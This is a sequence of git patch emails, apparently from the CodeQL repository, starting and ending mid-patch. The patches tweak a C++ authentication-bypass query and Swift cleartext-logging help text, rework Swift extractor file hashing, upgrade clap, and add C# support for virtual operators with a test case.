s.regexpMatch("\".*\\." + getATopLevelDomain() + "\"") + s.regexpMatch("\".*\\.(" + concat(getATopLevelDomain(), "|") + ")\"") ) } From 1a416884d4a42f02b39da95d15f22e69354a65e8 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 13 Jan 2023 20:27:07 +0000 Subject: [PATCH 282/381] C++: Do something similar with the other three cases. --- cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql b/cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql index 40aae5e2cfa..6372e781879 100644 --- a/cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql +++ b/cpp/ql/src/Security/CWE/CWE-290/AuthenticationBypass.ql @@ -31,9 +31,7 @@ predicate hardCodedAddressOrIP(StringLiteral txt) { // Hard-coded ip addresses, such as 127.0.0.1 s.regexpMatch("\"[0-9]+[.][0-9]+[.][0-9]+[.][0-9]+\"") or // Hard-coded addresses such as www.mycompany.com - s.matches("\"www.%\"") or - s.matches("\"http:%\"") or - s.matches("\"https:%\"") or + s.regexpMatch("\"(www\\.|http:|https:).*\"") or s.regexpMatch("\".*\\.(" + concat(getATopLevelDomain(), "|") + ")\"") ) } From cf7189bb2896a9cde9cdfad284c4cb5eb1de0cd2 Mon Sep 17 00:00:00 2001 From: jelaiw <14236583+jelaiw@users.noreply.github.com> Date: Fri, 13 Jan 2023 19:16:11 -0600 Subject: [PATCH 283/381] Fix small typo in good/bad code sample. --- java/ql/src/Security/CWE/CWE-327/BrokenCryptoAlgorithm.java | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/java/ql/src/Security/CWE/CWE-327/BrokenCryptoAlgorithm.java b/java/ql/src/Security/CWE/CWE-327/BrokenCryptoAlgorithm.java index 7d8299f2369..6a66258747f 100644 --- a/java/ql/src/Security/CWE/CWE-327/BrokenCryptoAlgorithm.java +++ b/java/ql/src/Security/CWE/CWE-327/BrokenCryptoAlgorithm.java @@ -7,6 +7,6 @@ byte[] encrypted = cipher.doFinal(input.getBytes("UTF-8")); // ... // GOOD: AES is a strong algorithm -Cipher des = Cipher.getInstance("AES"); +Cipher aes = Cipher.getInstance("AES"); -// ... \ No newline at end of file +// ... From fdb3b65bcea14b162a59a4a6c6b8e7a1d2a43cdd Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Mon, 16 Jan 2023 11:57:37 +0100 Subject: [PATCH 284/381] Apply suggestions from code review Co-authored-by: Ben Ahmady <32935794+subatoi@users.noreply.github.com> --- .../Security/CWE-312/CleartextLogging.qhelp | 18 +++++++----------- .../Security/CWE-312/CleartextLogging.ql | 2 +- 2 files changed, 8 insertions(+), 12 deletions(-) diff --git a/swift/ql/src/queries/Security/CWE-312/CleartextLogging.qhelp b/swift/ql/src/queries/Security/CWE-312/CleartextLogging.qhelp index fc5c7ed6f5e..5959fe5ef8d 100644 --- a/swift/ql/src/queries/Security/CWE-312/CleartextLogging.qhelp +++ b/swift/ql/src/queries/Security/CWE-312/CleartextLogging.qhelp @@ -5,37 +5,33 @@

    -Sensitive information that is logged unencrypted is accessible to an attacker -who gains access to the logs. +Attackers could gain access to sensitive information that is logged unencrypted.

    -Ensure that sensitive information is always encrypted or obfuscated before being -logged. +Always make sure to encrypt or obfuscate sensitive information before you log it.

    -In general, decrypt sensitive information only at the point where it is -necessary for it to be used in cleartext. +Generally, you should decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.

    -Be aware that external processes often store the standard out and -standard error streams of the application, causing logged sensitive -information to be stored. +Be aware that external processes often store the standard output and +standard error streams of the application. This will include logged sensitive information.

    The following example code logs user credentials (in this case, their password) -in plain text: +in plaintext:

    -Instead, the credentials should be encrypted, obfuscated, or omitted entirely: +Instead, you should encrypt or obfuscate the credentials, or omit them entirely:

    diff --git a/swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql b/swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql index 2b21b5da1bc..ecff134f0bd 100644 --- a/swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql +++ b/swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql @@ -1,6 +1,6 @@ /** * @name Clear-text logging of sensitive information - * @description Logging sensitive information without encryption or hashing can + * @description Logging sensitive information in plaintext can * expose it to an attacker. * @kind path-problem * @problem.severity error From 874fe2b8f9bdeb84c9e4de8e69f03c486630c71e Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Mon, 16 Jan 2023 12:05:36 +0100 Subject: [PATCH 285/381] Swift: introduce an in-memory file hash cache File hashing is now done internally in `SwiftFileInterception` (and exported as a `getHashOfRealFile` function for future use in linkage awareness), and using a per-process in-memory cache. The persistent caching of paths is removed, so the solution is now robust against input file changes during the build. For the same reason, the hash to artifact mapping have the symlinks reversed now. The artifacts themselves are stored using the hash as filenames, and the original paths of the artifacts are reacreated in the scratch dir with symlinks mostly for debugging purposes (to understand what artifact each hash corresponds to, and to follow what was built by the extractor). --- swift/extractor/infra/file/BUILD.bazel | 1 - swift/extractor/infra/file/FileHash.cpp | 32 -------- swift/extractor/infra/file/FileHash.h | 11 --- swift/extractor/infra/file/Path.cpp | 6 +- swift/extractor/infra/file/Path.h | 10 ++- swift/extractor/main.cpp | 2 +- swift/extractor/remapping/BUILD.bazel | 2 + .../remapping/SwiftFileInterception.cpp | 75 +++++++++++++------ .../remapping/SwiftFileInterception.h | 7 +- .../posix-only/frontend-invocations/build.sh | 2 + .../posix-only/frontend-invocations/test.py | 2 +- 11 files changed, 75 insertions(+), 75 deletions(-) delete mode 100644 swift/extractor/infra/file/FileHash.cpp delete mode 100644 swift/extractor/infra/file/FileHash.h diff --git a/swift/extractor/infra/file/BUILD.bazel b/swift/extractor/infra/file/BUILD.bazel index f26290edc41..d2c8c0ee925 100644 --- a/swift/extractor/infra/file/BUILD.bazel +++ b/swift/extractor/infra/file/BUILD.bazel @@ -5,7 +5,6 @@ swift_cc_library( srcs = glob(["*.cpp"]), hdrs = glob(["*.h"]) + [":path_hash_workaround"], visibility = ["//swift:__subpackages__"], - deps = ["@picosha2"], ) genrule( diff --git a/swift/extractor/infra/file/FileHash.cpp b/swift/extractor/infra/file/FileHash.cpp deleted file mode 100644 index 6c6fc001e81..00000000000 --- a/swift/extractor/infra/file/FileHash.cpp +++ /dev/null @@ -1,32 +0,0 @@ -#include "swift/extractor/infra/file/FileHash.h" -#include -#include -#include -#include -#include - -namespace codeql { -std::string hashFile(const std::filesystem::path& file) { - // using `open` instead of `std::ifstream` to reuse `hashFile(int)` below - if (auto fd = ::open(file.c_str(), O_RDONLY); fd >= 0) { - return hashFile(fd); - } - return ""; -} - -std::string hashFile(int fd) { - auto hasher = picosha2::hash256_one_by_one(); - constexpr size_t bufferSize = 16 * 1024; - char buffer[bufferSize]; - ssize_t bytesRead = 0; - while ((bytesRead = ::read(fd, buffer, bufferSize)) > 0) { - hasher.process(buffer, buffer + bytesRead); - } - ::close(fd); - if (bytesRead < 0) { - return ""; - } - hasher.finish(); - return get_hash_hex_string(hasher); -} -} // namespace codeql diff --git a/swift/extractor/infra/file/FileHash.h b/swift/extractor/infra/file/FileHash.h deleted file mode 100644 index 92966b1062e..00000000000 --- a/swift/extractor/infra/file/FileHash.h +++ /dev/null @@ -1,11 +0,0 @@ -#include -#include - -namespace codeql { -// Returns the hash of the file contents. Returns empty string on errors. -std::string hashFile(const std::filesystem::path& file); - -// Returns the hash of the file descriptor contents. Closes the file descriptor. -// Returns empty string on errors. -std::string hashFile(int fd); -} // namespace codeql diff --git a/swift/extractor/infra/file/Path.cpp b/swift/extractor/infra/file/Path.cpp index f114bfdd41b..7e293eb8812 100644 --- a/swift/extractor/infra/file/Path.cpp +++ b/swift/extractor/infra/file/Path.cpp @@ -16,7 +16,7 @@ static bool shouldCanonicalize() { return true; } -std::filesystem::path resolvePath(std::string_view path) { +std::filesystem::path resolvePath(const std::filesystem::path& path) { std::error_code ec; std::filesystem::path ret = {}; static const auto canonicalize = shouldCanonicalize(); @@ -26,8 +26,8 @@ std::filesystem::path resolvePath(std::string_view path) { ret = std::filesystem::absolute(path, ec); } if (ec) { - std::cerr << "Cannot get " << (canonicalize ? "canonical" : "absolute") - << " path: " << std::quoted(path) << ": " << ec.message() << "\n"; + std::cerr << "Cannot get " << (canonicalize ? "canonical" : "absolute") << " path: " << path + << ": " << ec.message() << "\n"; return path; } return ret; diff --git a/swift/extractor/infra/file/Path.h b/swift/extractor/infra/file/Path.h index c1a31786454..5c7cca65833 100644 --- a/swift/extractor/infra/file/Path.h +++ b/swift/extractor/infra/file/Path.h @@ -3,5 +3,13 @@ #include namespace codeql { -std::filesystem::path resolvePath(std::string_view path); +std::filesystem::path resolvePath(const std::filesystem::path& path); + +inline std::filesystem::path resolvePath(std::string_view path) { + return resolvePath(std::filesystem::path{path}); } + +inline std::filesystem::path resolvePath(const std::string& path) { + return resolvePath(std::filesystem::path{path}); +} +} // namespace codeql diff --git a/swift/extractor/main.cpp b/swift/extractor/main.cpp index 5fb3cb3d7a8..1228dc44000 100644 --- a/swift/extractor/main.cpp +++ b/swift/extractor/main.cpp @@ -181,7 +181,7 @@ int main(int argc, char** argv) { const auto configuration = configure(argc, argv); - auto openInterception = codeql::setupFileInterception(configuration.getTempArtifactDir()); + auto openInterception = codeql::setupFileInterception(configuration); auto invocationTrapFile = invocationTargetFile(configuration); codeql::TrapDomain invocationDomain(invocationTrapFile); diff --git a/swift/extractor/remapping/BUILD.bazel b/swift/extractor/remapping/BUILD.bazel index dafd1f9e3a9..da5eee55dc1 100644 --- a/swift/extractor/remapping/BUILD.bazel +++ b/swift/extractor/remapping/BUILD.bazel @@ -6,7 +6,9 @@ swift_cc_library( hdrs = glob(["*.h"]), visibility = ["//swift:__subpackages__"], deps = [ + "//swift/extractor/config", "//swift/extractor/infra/file", "//swift/third_party/swift-llvm-support", + "@picosha2", ], ) diff --git a/swift/extractor/remapping/SwiftFileInterception.cpp b/swift/extractor/remapping/SwiftFileInterception.cpp index ff97f97869c..7cbf3f87a67 100644 --- a/swift/extractor/remapping/SwiftFileInterception.cpp +++ b/swift/extractor/remapping/SwiftFileInterception.cpp @@ -4,12 +4,16 @@ #include #include +#include #include #include #include +#include -#include "swift/extractor/infra/file/FileHash.h" -#include "swift/extractor/infra/file/FileHash.h" +#include + +#include "swift/extractor/infra/file/PathHash.h" +#include "swift/extractor/infra/file/Path.h" #ifdef __APPLE__ // path is hardcoded as otherwise redirection could break when setting DYLD_FALLBACK_LIBRARY_PATH @@ -64,6 +68,28 @@ bool mayBeRedirected(const char* path, int flags = O_RDONLY) { endsWith(path, ".swiftmodule")); } +std::optional hashFile(const fs::path& path) { + auto fd = original::open(path.c_str(), O_RDONLY | O_CLOEXEC); + if (fd < 0) { + auto ec = std::make_error_code(static_cast(errno)); + std::cerr << "unable to open " << path << " for reading (" << ec.message() << ")\n"; + return std::nullopt; + } + auto hasher = picosha2::hash256_one_by_one(); + constexpr size_t bufferSize = 16 * 1024; + char buffer[bufferSize]; + ssize_t bytesRead = 0; + while ((bytesRead = ::read(fd, buffer, bufferSize)) > 0) { + hasher.process(buffer, buffer + bytesRead); + } + ::close(fd); + if (bytesRead < 0) { + return std::nullopt; + } + hasher.finish(); + return get_hash_hex_string(hasher); +} + } // namespace namespace codeql { @@ -72,22 +98,15 @@ class FileInterceptor { public: FileInterceptor(fs::path&& workingDir) : workingDir{std::move(workingDir)} { fs::create_directories(hashesPath()); - fs::create_directories(storePath()); } int open(const char* path, int flags, mode_t mode = 0) const { fs::path fsPath{path}; assert((flags & O_ACCMODE) == O_RDONLY); + // try to use the hash map first errno = 0; - // first, try the same path underneath the artifact store - if (auto ret = original::open(redirectedPath(path).c_str(), flags); - ret >= 0 || errno != ENOENT) { - return ret; - } - errno = 0; - // then try to use the hash map if (auto hashed = hashPath(path)) { - if (auto ret = original::open(hashed->c_str(), flags); ret >= 0 || errno != ENOENT) { + if (auto ret = original::open(hashed->c_str(), flags); errno != ENOENT) { return ret; } } @@ -96,17 +115,18 @@ class FileInterceptor { fs::path redirect(const fs::path& target) const { assert(mayBeRedirected(target.c_str())); - auto ret = redirectedPath(target); - fs::create_directories(ret.parent_path()); + auto redirected = redirectedPath(target); + fs::create_directories(redirected.parent_path()); if (auto hashed = hashPath(target)) { std::error_code ec; - fs::create_symlink(ret, *hashed, ec); + fs::create_symlink(*hashed, redirected, ec); if (ec) { - std::cerr << "Cannot remap file " << ret << " -> " << *hashed << ": " << ec.message() + std::cerr << "Cannot remap file " << *hashed << " -> " << redirected << ": " << ec.message() << "\n"; } + return *hashed; } - return ret; + return redirected; } private: @@ -119,8 +139,8 @@ class FileInterceptor { } std::optional hashPath(const fs::path& target) const { - if (auto fd = original::open(target.c_str(), O_RDONLY | O_CLOEXEC); fd >= 0) { - return hashesPath() / hashFile(fd); + if (auto hashed = getHashOfRealFile(target)) { + return hashesPath() / *hashed; } return std::nullopt; } @@ -128,8 +148,18 @@ class FileInterceptor { fs::path workingDir; }; -int openReal(const fs::path& path) { - return original::open(path.c_str(), O_RDONLY | O_CLOEXEC); +std::optional getHashOfRealFile(const fs::path& path) { + static std::unordered_map cache; + auto resolved = resolvePath(path); + if (auto found = cache.find(resolved); found != cache.end()) { + return found->second; + } + + if (auto hashed = hashFile(resolved)) { + cache.emplace(resolved, *hashed); + return hashed; + } + return std::nullopt; } fs::path redirect(const fs::path& target) { @@ -140,8 +170,9 @@ fs::path redirect(const fs::path& target) { } } -std::shared_ptr setupFileInterception(fs::path workginDir) { - auto ret = std::make_shared(std::move(workginDir)); +std::shared_ptr setupFileInterception( + const SwiftExtractorConfiguration& configuration) { + auto ret = std::make_shared(configuration.getTempArtifactDir()); fileInterceptorInstance() = ret; return ret; } diff --git a/swift/extractor/remapping/SwiftFileInterception.h b/swift/extractor/remapping/SwiftFileInterception.h index 80a298d454f..b669c4dd9f5 100644 --- a/swift/extractor/remapping/SwiftFileInterception.h +++ b/swift/extractor/remapping/SwiftFileInterception.h @@ -5,15 +5,16 @@ #include #include -#include "swift/extractor/infra/file/PathHash.h" +#include "swift/extractor/config/SwiftExtractorConfiguration.h" namespace codeql { -int openReal(const std::filesystem::path& path); +std::optional getHashOfRealFile(const std::filesystem::path& path); class FileInterceptor; -std::shared_ptr setupFileInterception(std::filesystem::path workingDir); +std::shared_ptr setupFileInterception( + const SwiftExtractorConfiguration& configuration); std::filesystem::path redirect(const std::filesystem::path& target); } // namespace codeql diff --git a/swift/integration-tests/posix-only/frontend-invocations/build.sh b/swift/integration-tests/posix-only/frontend-invocations/build.sh index fb1388e427c..62df2bb064e 100755 --- a/swift/integration-tests/posix-only/frontend-invocations/build.sh +++ b/swift/integration-tests/posix-only/frontend-invocations/build.sh @@ -8,6 +8,8 @@ else FRONTEND="swift-frontend" fi +rm -rf *.swiftmodule *.o + $FRONTEND -frontend -c A.swift $SDK $FRONTEND -frontend -c B.swift -o B.o $SDK $FRONTEND -frontend -c -primary-file C.swift $SDK diff --git a/swift/integration-tests/posix-only/frontend-invocations/test.py b/swift/integration-tests/posix-only/frontend-invocations/test.py index 5dec3ca53a5..06f07282e2f 100644 --- a/swift/integration-tests/posix-only/frontend-invocations/test.py +++ b/swift/integration-tests/posix-only/frontend-invocations/test.py @@ -13,7 +13,7 @@ with open('hashes.expected', 'w') as expected: print(f.name, sha256(module.read()).hexdigest(), file=expected) with open('hashes.actual', 'w') as actual: - hashes = [(s.resolve().name, s.name) for s in Path("db/working/swift-extraction-artifacts/hashes").iterdir()] + hashes = [(s.name, s.resolve().name) for s in Path("db/working/swift-extraction-artifacts/store").iterdir()] hashes.sort() for module, hash in hashes: print(module, hash, file=actual) From d072ed969e689e64d48a8f7b9d754203a7a86dec Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Mon, 16 Jan 2023 12:34:56 +0100 Subject: [PATCH 286/381] update clap to 3.0 in QL-for-QL --- ql/Cargo.lock | Bin 14885 -> 15765 bytes ql/extractor/Cargo.toml | 2 +- ql/generator/Cargo.toml | 2 +- 3 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/Cargo.lock b/ql/Cargo.lock index 68c195d8775275ee4f3618453afff4bd67c45842..3468e1bf46d2f6b183679dcd9017aa559f4ec63b 100644 GIT binary patch delta 1070 zcmY+DKX05x5XN;ex?md;EWoy6fs8A#qSNl|%99a|R2nSFhf`JM--CdFI>slP{nBIUKqXjKKAe zhMyh;>xl$OGDoE1AQ<7|ON&@@4Un;<;skPXEf{dAU=WK~^$0Fef4cj2e|B^8o}8rf zqmz2EcXw@f@A$0Li_>&|`7oPLXUC_PxAQtZmC4Cu`tQ@l{NXg6_n%jHwyu`1eNpxI z$=U9QyL)B?{r>*p0Yowl8l?!58@f;mrG^Dnb8NXZ0To3-Trt)-q!4^#g5U|f73#n3 zZ?4UbRLD_&G_U=q)pr(ezWQRglV%U{bn@_Q?|N4Yqkrhc#I-6BbV>W!AZ*dG_ejaK z6ty~FG&Y06$|2PdTa6GPMotoA>>C?f{l{CsZe8*Ce;+&I$Bz#WY>ZR`i*170nr5mE zAQ-42#T;75?2Na@W8o+c*j2q!PDWyO%$E+lTz_r#!PRb*=bgoOx1S7dIPTBQ{jss7 zsu8V1%nFVYBXPzUv$dZ}r1wZAvmUfAtNw{KX} zzk1{FAUMsLm`YrIp=d#neHI zEr4Z{an@DRA|te#ghYcQAj}Q{qVW-(mgb}bf<>prgrp-7RVCJ@A+E0U#|;%B|X*6Q&R{QWcCb1+>{ojxnh0ip)s1m7pO87M5k6m+}|5 zzrNmI@jooS34aXU(k3U@;2TB1v3fWTrivFeGiR%$$V$?(Br)hPq*yr=5DjxS+CZ5* amz=}uq*Bq)^`|S#T@3p#D|dS1@Bao88aPe> delta 636 zcmY+ByKa*~5QSwBj%7<+B1i%#Qj{_fv$NM3lt8E`C=h;uXfLzEg`LQD5)c&<1r0^C zP$LQ?O3>dx$1Csvh@K8A3JNw(MK?3rJ#*$eZ=SuMef-ltEBmUnwg-2;upo@qfFddk zh#(+y%rYgbbO5KlmCV_awi$KG(Rv5c8IVCCl;_>0o*z$#yEC4Q)^C=#3s-MVXOro$ zHr=)L89$jFP5l16IT#P)UgFK8VVXUjPYyZmj>@lv)#i8SOS_CN{%C0Nb?c0@bIBfJl@WJQ;6&6Hc-D}PLey>+vVQ2XiR`-xA)4lQ9_S(AWL!VChaB^BE&0dBC;4Dj3$;gQH4)1f# z6)ig-1z`%3a%O8Jv50I0Id#IP4Cw3fJcpXn|7-C0cyI?oN*MrMU`vu6MN?&bKmw=< jRR6gy<)p0FD!N)weQpi26hP%td!<>t{j*iRZ+-p;Z`Zq+ diff --git a/ql/extractor/Cargo.toml b/ql/extractor/Cargo.toml index c5b0e938c0e..bd5ef0539b6 100644 --- a/ql/extractor/Cargo.toml +++ b/ql/extractor/Cargo.toml @@ -13,7 +13,7 @@ tree-sitter = ">= 0.20, < 0.21" tree-sitter-ql = { git = "https://github.com/tree-sitter/tree-sitter-ql.git", rev = "d08db734f8dc52f6bc04db53a966603122bc6985"} tree-sitter-ql-dbscheme = { git = "https://github.com/erik-krogh/tree-sitter-ql-dbscheme.git", rev = "63e1344353f63931e88bfbc2faa2e78e1421b213"} tree-sitter-ql-yaml = {git = "https://github.com/erik-krogh/tree-sitter-ql.git", rev = "cf704bf3671e1ae148e173464fb65a4d2bbf5f99"} -clap = "2.33" +clap = "3.0" tracing = "0.1" tracing-subscriber = { version = "0.3.3", features = ["env-filter"] } rayon = "1.5.0" diff --git a/ql/generator/Cargo.toml b/ql/generator/Cargo.toml index c0531a8f1e5..755cda04860 100644 --- a/ql/generator/Cargo.toml +++ b/ql/generator/Cargo.toml @@ -7,7 +7,7 @@ edition = "2018" # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html [dependencies] -clap = "2.33" +clap = "3.0" node-types = { path = "../node-types" } tracing = "0.1" tracing-subscriber = { version = "0.3.3", features = ["env-filter"] } From 8c2931cbb87632e944ab21cb5a2ecb5fa4a11075 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Thu, 5 Jan 2023 16:32:57 +0100 Subject: [PATCH 287/381] C#: Operators are now allowed to be declared virtual. --- csharp/ql/lib/semmle/code/csharp/Member.qll | 4 ++-- csharp/ql/lib/semmlecode.csharp.dbscheme | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/csharp/ql/lib/semmle/code/csharp/Member.qll b/csharp/ql/lib/semmle/code/csharp/Member.qll index ad314217024..c70a2091e9a 100644 --- a/csharp/ql/lib/semmle/code/csharp/Member.qll +++ b/csharp/ql/lib/semmle/code/csharp/Member.qll @@ -184,7 +184,7 @@ private class TOverridable = @virtualizable or @callable_accessor; /** * A declaration that can be overridden or implemented. That is, a method, - * a property, an indexer, an event, or an accessor. + * a property, an indexer, an event, an accessor, or an operator. * * Unlike `Virtualizable`, this class includes accessors. */ @@ -360,7 +360,7 @@ class Overridable extends Declaration, TOverridable { /** * A member where the `virtual` modifier is valid. That is, a method, - * a property, an indexer, or an event. + * a property, an indexer, an event or an operator. * * Equivalently, these are the members that can be defined in an interface. * diff --git a/csharp/ql/lib/semmlecode.csharp.dbscheme b/csharp/ql/lib/semmlecode.csharp.dbscheme index d0fba103f7d..1136957c0b3 100644 --- a/csharp/ql/lib/semmlecode.csharp.dbscheme +++ b/csharp/ql/lib/semmlecode.csharp.dbscheme @@ -670,7 +670,7 @@ compiler_generated(unique int id: @modifiable ref); @named_exprorstmt = @goto_stmt | @labeled_stmt | @expr; -@virtualizable = @method | @property | @indexer | @event; +@virtualizable = @method | @property | @indexer | @event | @operator; exprorstmt_name( unique int parent_id: @named_exprorstmt ref, From dc50b6bad36bfc271acb8120258d9e8227df2973 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 6 Jan 2023 12:00:47 +0100 Subject: [PATCH 288/381] C#: Support for operators in implements relations. --- .../ql/lib/semmle/code/csharp/Implements.qll | 41 +++++++++++++------ csharp/ql/lib/semmle/code/csharp/Member.qll | 2 +- 2 files changed, 30 insertions(+), 13 deletions(-) diff --git a/csharp/ql/lib/semmle/code/csharp/Implements.qll b/csharp/ql/lib/semmle/code/csharp/Implements.qll index af7fa7c0e46..96556293a9d 100644 --- a/csharp/ql/lib/semmle/code/csharp/Implements.qll +++ b/csharp/ql/lib/semmle/code/csharp/Implements.qll @@ -129,7 +129,7 @@ pragma[nomagic] private Virtualizable getACompatibleInterfaceMemberAux(Virtualizable m) { result = getACompatibleInterfaceAccessor(m) or result = getACompatibleInterfaceIndexer(m) or - result = getACompatibleInterfaceMethod(m) + result = getACompatibleRelevantInterfaceMember(m) } /** @@ -210,11 +210,13 @@ private predicate getACompatibleInterfaceIndexerAux(Indexer i, ValueOrRefType t) t = getAPossibleImplementor(i.getDeclaringType()) } -private Method getACompatibleInterfaceMethod0(Method m, int i) { - result = getAnInterfaceMethodCandidate(m) and +private RelevantInterfaceMember getACompatibleRelevantInterfaceMember0( + RelevantInterfaceMember m, int i +) { + result = getARelevantInterfaceMemberCandidate(m) and i = -1 or - result = getACompatibleInterfaceMethod0(m, i - 1) and + result = getACompatibleRelevantInterfaceMember0(m, i - 1) and exists(Type t1, Type t2 | t1 = getArgumentOrReturnType(m, i) and t2 = getArgumentOrReturnType(result, i) @@ -223,32 +225,47 @@ private Method getACompatibleInterfaceMethod0(Method m, int i) { ) } -private Method getACompatibleInterfaceMethod(Method m) { - result = getACompatibleInterfaceMethod0(m, m.getNumberOfParameters()) +/** + * A class of callables relevant for interface member compatibility. + */ +private class RelevantInterfaceMember extends Callable { + RelevantInterfaceMember() { + this instanceof Method or + this instanceof Operator + } + + predicate isPublic() { + this.(Method).isPublic() or + this.(Operator).isPublic() + } +} + +private RelevantInterfaceMember getACompatibleRelevantInterfaceMember(RelevantInterfaceMember m) { + result = getACompatibleRelevantInterfaceMember0(m, m.getNumberOfParameters()) } /** - * Gets an interface method that may potentially be implemented by `m`. + * Gets an interface method or operator that may potentially be implemented by `m`. * * That is, a method with the same name, same number of parameters, and declared * in a type that is a possible implementor type for the interface type. */ -private Method getAnInterfaceMethodCandidate(Method m) { - getAPotentialInterfaceMethodAux(result, m.getDeclaringType(), m.getUndecoratedName(), +private RelevantInterfaceMember getARelevantInterfaceMemberCandidate(RelevantInterfaceMember m) { + getAPotentialRelevantInterfaceMemberAux(result, m.getDeclaringType(), m.getUndecoratedName(), m.getNumberOfParameters()) and m.isPublic() } pragma[nomagic] -private predicate getAPotentialInterfaceMethodAux( - Method m, ValueOrRefType t, string name, int params +private predicate getAPotentialRelevantInterfaceMemberAux( + RelevantInterfaceMember m, ValueOrRefType t, string name, int params ) { t = getAPossibleImplementor(m.getDeclaringType()) and name = m.getUndecoratedName() and params = m.getNumberOfParameters() } -private Type getArgumentOrReturnType(Method m, int i) { +private Type getArgumentOrReturnType(RelevantInterfaceMember m, int i) { i = 0 and result = m.getReturnType() or result = m.getParameter(i - 1).getType() diff --git a/csharp/ql/lib/semmle/code/csharp/Member.qll b/csharp/ql/lib/semmle/code/csharp/Member.qll index c70a2091e9a..85225ac44cf 100644 --- a/csharp/ql/lib/semmle/code/csharp/Member.qll +++ b/csharp/ql/lib/semmle/code/csharp/Member.qll @@ -360,7 +360,7 @@ class Overridable extends Declaration, TOverridable { /** * A member where the `virtual` modifier is valid. That is, a method, - * a property, an indexer, an event or an operator. + * a property, an indexer, an event, or an operator. * * Equivalently, these are the members that can be defined in an interface. * From 3552a41552e92f961e9e9feed3ea949e4cc93453 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 6 Jan 2023 13:41:02 +0100 Subject: [PATCH 289/381] C#: Add test case for static abstract and static virtual interface members. --- .../csharp11/StaticInterfaceMembers.cs | 34 +++++++++++++++++++ .../csharp11/staticInterfaceMembers.expected | 20 +++++++++++ .../csharp11/staticInterfaceMembers.ql | 18 ++++++++++ 3 files changed, 72 insertions(+) create mode 100644 csharp/ql/test/library-tests/csharp11/StaticInterfaceMembers.cs create mode 100644 csharp/ql/test/library-tests/csharp11/staticInterfaceMembers.expected create mode 100644 csharp/ql/test/library-tests/csharp11/staticInterfaceMembers.ql diff --git a/csharp/ql/test/library-tests/csharp11/StaticInterfaceMembers.cs b/csharp/ql/test/library-tests/csharp11/StaticInterfaceMembers.cs new file mode 100644 index 00000000000..6be0ddc54b1 --- /dev/null +++ b/csharp/ql/test/library-tests/csharp11/StaticInterfaceMembers.cs @@ -0,0 +1,34 @@ +public interface INumber where T : INumber +{ + static abstract T operator ++(T other); + + static virtual T operator --(T other) => other; + + static abstract T Add(T left, T right); + + static virtual T Subtract(T left, T right) => left; + + static T Zero() => default(T); +} + +public class Complex : INumber +{ + public double Real { get; private set; } = 0.0; + public double Imaginary { get; private set; } = 0.0; + + public Complex() { } + + public static Complex Zero() => new Complex(); + + public static Complex operator ++(Complex other) => + new Complex { Real = other.Real + 1.0, Imaginary = other.Imaginary }; + + public static Complex operator --(Complex other) => + new Complex { Real = other.Real - 1.0, Imaginary = other.Imaginary }; + + public static Complex Add(Complex left, Complex right) => + new Complex { Real = left.Real + right.Real, Imaginary = left.Imaginary + right.Imaginary }; + + public static Complex Subtract(Complex left, Complex right) => + new Complex { Real = left.Real - right.Real, Imaginary = left.Imaginary - right.Imaginary }; +} \ No newline at end of file diff --git a/csharp/ql/test/library-tests/csharp11/staticInterfaceMembers.expected b/csharp/ql/test/library-tests/csharp11/staticInterfaceMembers.expected new file mode 100644 index 00000000000..c5068de6372 --- /dev/null +++ b/csharp/ql/test/library-tests/csharp11/staticInterfaceMembers.expected @@ -0,0 +1,20 @@ +interfacemembers +| INumber<> | StaticInterfaceMembers.cs:3:32:3:33 | ++ | abstract | +| INumber<> | StaticInterfaceMembers.cs:3:32:3:33 | ++ | public | +| INumber<> | StaticInterfaceMembers.cs:3:32:3:33 | ++ | static | +| INumber<> | StaticInterfaceMembers.cs:5:31:5:32 | -- | public | +| INumber<> | StaticInterfaceMembers.cs:5:31:5:32 | -- | static | +| INumber<> | StaticInterfaceMembers.cs:5:31:5:32 | -- | virtual | +| INumber<> | StaticInterfaceMembers.cs:7:23:7:25 | Add | abstract | +| INumber<> | StaticInterfaceMembers.cs:7:23:7:25 | Add | public | +| INumber<> | StaticInterfaceMembers.cs:7:23:7:25 | Add | static | +| INumber<> | StaticInterfaceMembers.cs:9:22:9:29 | Subtract | public | +| INumber<> | StaticInterfaceMembers.cs:9:22:9:29 | Subtract | static | +| INumber<> | StaticInterfaceMembers.cs:9:22:9:29 | Subtract | virtual | +| INumber<> | StaticInterfaceMembers.cs:11:14:11:17 | Zero | public | +| INumber<> | StaticInterfaceMembers.cs:11:14:11:17 | Zero | static | +implements +| StaticInterfaceMembers.cs:23:36:23:37 | ++ | StaticInterfaceMembers.cs:3:32:3:33 | ++ | +| StaticInterfaceMembers.cs:26:36:26:37 | -- | StaticInterfaceMembers.cs:5:31:5:32 | -- | +| StaticInterfaceMembers.cs:29:27:29:29 | Add | StaticInterfaceMembers.cs:7:23:7:25 | Add | +| StaticInterfaceMembers.cs:32:27:32:34 | Subtract | StaticInterfaceMembers.cs:9:22:9:29 | Subtract | diff --git a/csharp/ql/test/library-tests/csharp11/staticInterfaceMembers.ql b/csharp/ql/test/library-tests/csharp11/staticInterfaceMembers.ql new file mode 100644 index 00000000000..0d92606e4dd --- /dev/null +++ b/csharp/ql/test/library-tests/csharp11/staticInterfaceMembers.ql @@ -0,0 +1,18 @@ +import csharp + +query predicate interfacemembers(string interface, Member m, string modifier) { + exists(Interface i | + i.isUnboundDeclaration() and + 